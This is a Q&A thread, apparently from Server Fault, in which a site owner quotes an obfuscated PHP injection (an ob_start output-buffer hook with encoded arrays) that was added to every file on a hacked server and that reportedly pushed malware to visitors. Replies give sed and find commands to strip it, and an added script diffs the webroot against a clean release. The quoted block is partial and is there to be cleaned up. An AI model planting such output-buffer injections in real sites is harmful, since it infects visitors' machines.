
Possible Duplicate:
My server's been hacked EMERGENCY

Hello,

I need your help urgently, as the server has been hacked and I do not have time to learn how to remove the hacker's code from all the files. I have attached the code which was added to all files. There are many special characters in this code and it's quite large. In some files it was added twice.

I do not know sed well enough to solve this issue with it. How can I remove this piece of code from all files? Using sed, diff/patch or other techniques?

Here is part of the code to be removed:

    <?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
        $tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, 41, 30, 88, 46, 33, 51);
        $tr = array(50, 2, 5, 4, 11, 26, 3, 0, 3, 30, 26, 1, 28, 32, 3, 1, 61, 3, 52, 44, 21, 31, 21, 2, 5, 4, 11, 26, 3, 32, 60, 11, 25, 0, 9, 3, 30, 26, 1, 7, 25, 9, 4, 1, 14, 1, 25, 16, 5, 7, 13, 7, 4, 2, 8, 28, 28, 32, 24, 15, 14, 1, 25, 11, 15, 1, 14, 32, 8, 0, 36, 0, 0, 0, 31, 21, 4, 0, 14, 11, 31, 16, 5, 7, 13, 7, 4, 2, 0, 28, 0, 15, 1, 42, 0, 63, 4, 
-------------

-------------
       $i++; $s=substr($s,0,$i).$ob_htm.substr($s,$i);

        return $s;
   }
   $ob_starting = time();
   @ob_start("ob_start_flush");

I will appreciate any help. Thanks.

Update:

I have tried using the code like:

for fname $(grep *.php .); do
        while read; do
                sed -i 's/$REPLY//' $fname
        done < filem
done

where filem is a file containing the malicious code. In this file I replaced all special characters like $<( etc. with the dot '.', but sed still gives many errors.

Andrew
  • Nuke it from orbit and restore from backup. For bonus points take an image and investigate after you're finished with the first step. – Chris S May 05 '11 at 03:11
  • It's not the duplicate, Chris, please! I cannot restore from backups, it's not the case. – Andrew May 05 '11 at 03:32
  • If you can't restore from backups, that means you haven't taken any backups. In which case, you kinda deserve what you get. You don't patch compromised systems. You rebuild from backups, and close the original security hole. Anything else is asking for more pwnage. – Holocryptic May 05 '11 at 03:39
  • @Holocryptic I do perform backups on a weekly basis, as my company's terms require. But in this case I need the latest version of the site. Why don't you write a few lines of code to help me? I would be very grateful for any advice regarding the code. – Andrew May 05 '11 at 03:53
  • @user78650 The reason that they're suggesting to go back to a non-hacked state is that you have no way of knowing that those chunks of code are truly the only modification that the attacker made to the server. – Shane Madden May 05 '11 at 03:56
  • @user, we don't write you a few lines of code because we are helping you. I know that might be hard to accept, but it is what it is. – Chris S May 05 '11 at 04:03
  • A quick google shows that whatever else this code is doing, one thing's for sure - it's re-directing your visitors and installing virii and all sorts of bad things onto their machines. Take your site offline *now*, or else everyone who passes through will be infected. – Mark Henderson May 05 '11 at 04:13
  • @Chris S I understand. It's hard to be a novice sometimes. – Andrew May 05 '11 at 14:23
  • @Mark Henderson Yes, the code is uploading malware to the users' machines; here is the topic where its code is discussed: [link](http://stackoverflow.com/questions/5456462/what-does-this-php-code-do) – Andrew May 05 '11 at 14:27

2 Answers

5

The advice in the comments is completely correct. You really do need to restore from backup, but if the hacker's code looks EXACTLY like your example above you can try this (make a backup copy of your webroot first.)

sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' cleanme.php 

To walk the webroot and all subdirectories you can use find:

find "$WEBROOT" -type f -exec sed -i '/<?php global $ob_starting;/,/@ob_start("ob_start_flush");/d' {} \;

The sed removes everything between the start and end variables given. Good luck.

mfarver
  • Thank you very much. You advice was very helpful. Thank you once more. I will start learning sed as soon as possible. – Andrew May 05 '11 at 04:39
  • @user78650, while learning `sed` would certainly be useful I suggest you first concentrate on getting your backups working. – John Gardeniers May 05 '11 at 05:51
0

Are you using osCommerce? Perhaps you should look in their support forums; there seem to be others dealing with nearly the same thing. Removing the code without understanding the problem will most likely result in it happening again.

http://forums.oscommerce.com/topic/373376-hacked-by-code-global-ob-starting/

http://forums.oscommerce.com/topic/373373-site-hacked-should-you-upgrade-or-try-to-fix-it-as-it-is/

DNAspark99
  • Thank you for the links, I will check them. It's not osCommerce, it's the 'Website Baker' project or something like that. Anyway, I am obliged to remove the code to bring the sites back, and only then to investigate the intrusion. I do need to remove the code. – Andrew May 05 '11 at 03:32
  • You may want to make sure that you never reveal who you work for, then. They can face massive liability from customers, etc. for knowingly putting back into production a compromised server. – Hyppy May 05 '11 at 04:38
  • huge +1 for Hyppy here. Seriously @user - do not just fix that code and bring the site back up. Any attacker worth their salt will have done much more than that which you can see, and as @Hyppy says - you KNOW it is compromised. Serious liability issues! – Rory Alsop May 05 '11 at 07:59
  • @Rory Alsop I seem not to have any choice. Thank you for advice. – Andrew May 05 '11 at 14:28
  • Actually a lot of compromises today are just automated defacements or insertion of malicious code. The attacker has no interest in compromising the server, just the website. Since the attacks are done by scripts they are easy to clean up after. You still have to close the hole that let the attacker in, but the machine is seldom rooted. Having said that, it is still good advice to assume that if the attacker got in, he probably got root. Too many local exploits floating around... – mfarver May 05 '11 at 16:23
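Several commenters above make the point that the injected block is only the modification that happened to be noticed. One way to check the rest of the tree, as an added example that is not from the thread, is to compare the live webroot with an untouched extract of the same CMS release: every file that is new, changed or missing relative to that baseline is a candidate for review before the site goes back online. The function below does that with `find` and `cmp`; the two sample trees it builds are constructed for the demonstration, and it assumes the baseline really is the same version that was deployed.

```shell
#!/bin/sh
# Added example, not from the original thread. Lists every file under a live
# webroot that is new, changed or missing relative to a known-good copy of the
# same release, so clean-up is not limited to the one block that was noticed.
# Assumption: the baseline is an untouched extract of exactly the deployed version.
set -e

# Print one line per suspect file: ADDED (only in the live tree), MODIFIED
# (content differs) or MISSING (only in the baseline). Paths are relative and
# sorted in the C locale so the output is stable enough to diff between runs.
list_suspects() {
    baseline=$1
    live=$2
    {
        (cd "$baseline" && find . -type f)
        (cd "$live" && find . -type f)
    } | LC_ALL=C sort -u | while IFS= read -r rel; do
        if [ ! -f "$live/$rel" ]; then
            echo "MISSING  $rel"
        elif [ ! -f "$baseline/$rel" ]; then
            echo "ADDED    $rel"
        elif ! cmp -s "$baseline/$rel" "$live/$rel"; then
            echo "MODIFIED $rel"
        fi
    done
}

# Constructed sample: the baseline is a three-file "release"; the live copy has
# index.php altered, one file added under uploads/ and one library file gone.
make_sample_trees() {
    mkdir -p "$1/lib" "$2/lib" "$2/uploads"
    printf '%s\n' '<?php echo "index";' > "$1/index.php"
    printf '%s\n' '<?php function a() {}' > "$1/lib/a.php"
    printf '%s\n' '<?php function b() {}' > "$1/lib/b.php"
    printf '%s\n' '<?php global $ob_starting;' '<?php echo "index";' > "$2/index.php"
    printf '%s\n' '<?php function a() {}' > "$2/lib/a.php"
    printf '%s\n' '<?php echo "not in the release";' > "$2/uploads/extra.php"
}

# Usage: sh list_suspects.sh --demo   (compares two throwaway sample trees)
if [ "${1:-}" = "--demo" ]; then
    base=$(mktemp -d); live=$(mktemp -d)
    make_sample_trees "$base" "$live"
    list_suspects "$base" "$live"
    rm -rf "$base" "$live"
fi
```

Files that legitimately differ from the release (configuration, uploads, templates) will show up too, which is the point: each one gets looked at once, instead of trusting that the block found in the first pass was the only change.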